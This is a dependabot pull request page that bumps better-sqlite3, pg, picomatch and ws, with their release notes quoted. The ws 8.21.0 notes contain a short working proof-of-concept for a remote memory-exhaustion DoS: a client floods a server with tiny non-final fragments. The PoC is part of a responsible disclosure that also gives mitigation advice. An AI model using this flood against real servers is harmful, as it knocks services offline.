Skip to content

chore(deps): bump the npm-minor-patch group across 1 directory with 4 updates#28

Open
dependabot[bot] wants to merge 1 commit into
masterfrom
dependabot/npm_and_yarn/npm-minor-patch-4e15807bf1
Open

chore(deps): bump the npm-minor-patch group across 1 directory with 4 updates#28
dependabot[bot] wants to merge 1 commit into
masterfrom
dependabot/npm_and_yarn/npm-minor-patch-4e15807bf1

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github Jul 7, 2026

Copy link
Copy Markdown
Contributor

Bumps the npm-minor-patch group with 4 updates in the / directory: better-sqlite3, pg, picomatch and ws.

Updates better-sqlite3 from 12.9.0 to 12.11.1

Release notes

Sourced from better-sqlite3's releases.

v12.11.1

What's Changed

Full Changelog: WiseLibs/better-sqlite3@v12.11.0...v12.11.1

v12.11.0

⚠️CAUTION: NOT A VIABLE RELEASE

Use v12.11.1 instead.

What's Changed

Full Changelog: WiseLibs/better-sqlite3@v12.10.1...v12.11.0

v12.10.1

What's Changed

Full Changelog: WiseLibs/better-sqlite3@v12.10.0...v12.10.1

v12.10.0

What's Changed

Full Changelog: WiseLibs/better-sqlite3@v12.9.1...v12.10.0

v12.9.1

⚠️CAUTION: NOT A VIABLE RELEASE

Electron v39+ prebuilds are not building successfully at the moment. Stick to v12.9.0 for now.

What's Changed

New Contributors

Full Changelog: WiseLibs/better-sqlite3@v12.9.0...v12.9.1

Commits

Updates pg from 8.21.0 to 8.22.0

Changelog

Sourced from pg's changelog.

pg@8.22.0

Commits

Updates picomatch from 4.0.4 to 4.0.5

Release notes

Sourced from picomatch's releases.

4.0.5

What's Changed

New Contributors

Full Changelog: micromatch/picomatch@4.0.4...4.0.5

Commits
  • 4f41a8e 4.0.5
  • 02cfc1b Update .verb.md and run verb to generate README documentation
  • cc52ff6 Only run the upload code coverage step for 1 matrix permutation
  • 6d426d7 Allow workflow to continue if the code coverage step to fails
  • a00b954 Merge branch 'codeql-coverage'
  • 9680381 Merge pull request #183 from MerlijnW70/fix/matchbase-windows-basename
  • 648b4f2 Merge pull request #182 from MerlijnW70/fix/repeated-extglob-drops-branches
  • 70e6485 Configure code coverage upload for CodeQL
  • ab8bc4d fix: honor the windows option when matching basenames
  • 6289307 fix: preserve all branches when rewriting risky repeated extglobs
  • Additional commits viewable in compare view

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

@dependabot dependabot Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code labels Jul 7, 2026
… updates

Bumps the npm-minor-patch group with 4 updates in the / directory: [better-sqlite3](https://github.com/WiseLibs/better-sqlite3), [pg](https://github.com/brianc/node-postgres/tree/HEAD/packages/pg), [picomatch](https://github.com/micromatch/picomatch) and [ws](https://github.com/websockets/ws).


Updates `better-sqlite3` from 12.9.0 to 12.11.1
- [Release notes](https://github.com/WiseLibs/better-sqlite3/releases)
- [Commits](WiseLibs/better-sqlite3@v12.9.0...v12.11.1)

Updates `pg` from 8.21.0 to 8.22.0
- [Changelog](https://github.com/brianc/node-postgres/blob/master/CHANGELOG.md)
- [Commits](https://github.com/brianc/node-postgres/commits/pg@8.22.0/packages/pg)

Updates `picomatch` from 4.0.4 to 4.0.5
- [Release notes](https://github.com/micromatch/picomatch/releases)
- [Changelog](https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md)
- [Commits](micromatch/picomatch@4.0.4...4.0.5)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

---
updated-dependencies:
- dependency-name: better-sqlite3
  dependency-version: 12.11.1
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-minor-patch
- dependency-name: pg
  dependency-version: 8.22.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-minor-patch
- dependency-name: picomatch
  dependency-version: 4.0.5
  dependency-type: direct:production
  update-type: version-update:semver-patch
  dependency-group: npm-minor-patch
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
  dependency-group: npm-minor-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot
dependabot Bot force-pushed the dependabot/npm_and_yarn/npm-minor-patch-4e15807bf1 branch from 82e148e to f9fb9bb Compare July 14, 2026 00:24
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants